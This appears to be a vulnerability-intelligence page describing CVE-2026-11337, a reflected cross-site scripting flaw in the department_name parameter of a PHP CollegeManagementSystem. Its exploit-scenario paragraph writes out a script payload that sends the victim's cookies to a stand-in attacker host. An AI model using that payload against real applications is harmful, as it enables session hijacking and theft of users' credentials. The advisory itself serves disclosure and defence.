Skip to main content

CollegeManagementSystem CVE-2026-11337

| EUVD-2026-34851 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-06-05 VulDB GHSA-74c3-9pm6-rxx9
2.1
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

3
Severity Changed
Jun 05, 2026 - 17:22 NVD
MEDIUM LOW
CVSS changed
Jun 05, 2026 - 17:22 NVD
4.3 (MEDIUM) 2.1 (LOW)
Analysis Generated
Jun 05, 2026 - 17:21 vuln.today

DescriptionCVE.org

A vulnerability was found in tittuvarghese CollegeManagementSystem 3e476335cfbfb9a049e09f474c7ec885f69a9df3/a38852979f7e27ae67b610dce5979500ef8ebe01. Affected by this vulnerability is an unknown functionality of the file /dashboard_page/forms/fetch.php. The manipulation of the argument department_name results in cross site scripting. The attack may be launched remotely. The exploit has been made public and could be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet.

AnalysisAI

Cross-site scripting in tittuvarghese's PHP-based CollegeManagementSystem exposes users to script injection via the unvalidated department_name parameter in /dashboard_page/forms/fetch.php, exploitable remotely without authentication but requiring victim interaction. Publicly available exploit code (GitHub issue #6) lowers the technical barrier for opportunistic attacks, though CVSS scope remains unchanged with only low integrity impact. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft XSS payload in department_name parameter
Delivery
Generate weaponized URL targeting /dashboard_page/forms/fetch.php
Exploit
Deliver link to authenticated victim via phishing
Execution
Victim browser loads URL and renders unescaped script
Persist
Attacker JavaScript executes in victim's session context
Impact
Session token or credentials exfiltrated to attacker

Vulnerability AssessmentAI

Exploitation The victim must be a CollegeManagementSystem user with an active browser session who can be socially engineered into clicking an attacker-controlled URL (CVSS UI:R is the critical limiting factor). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score of 4.3 (Medium) accurately reflects a contained impact profile: no confidentiality or availability loss (C:N/A:N), only low integrity impact (I:L), and mandatory user interaction (UI:R) that blocks fully automated exploitation. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker constructs a URL targeting `/dashboard_page/forms/fetch.php?department_name=<script>fetch('https://attacker.example/steal?c='+document.cookie)</script>` and delivers it to a CollegeManagementSystem user via phishing email or message. When the victim clicks the link while logged into the application, the unescaped payload is reflected into the page and executed in the victim's browser session context, enabling cookie theft or session hijacking. …
Remediation No vendor-released patch has been identified at time of analysis; the maintainer has not responded to the disclosure filed as GitHub issue #6 (https://github.com/tittuvarghese/CollegeManagementSystem/issues/6). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-11337 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy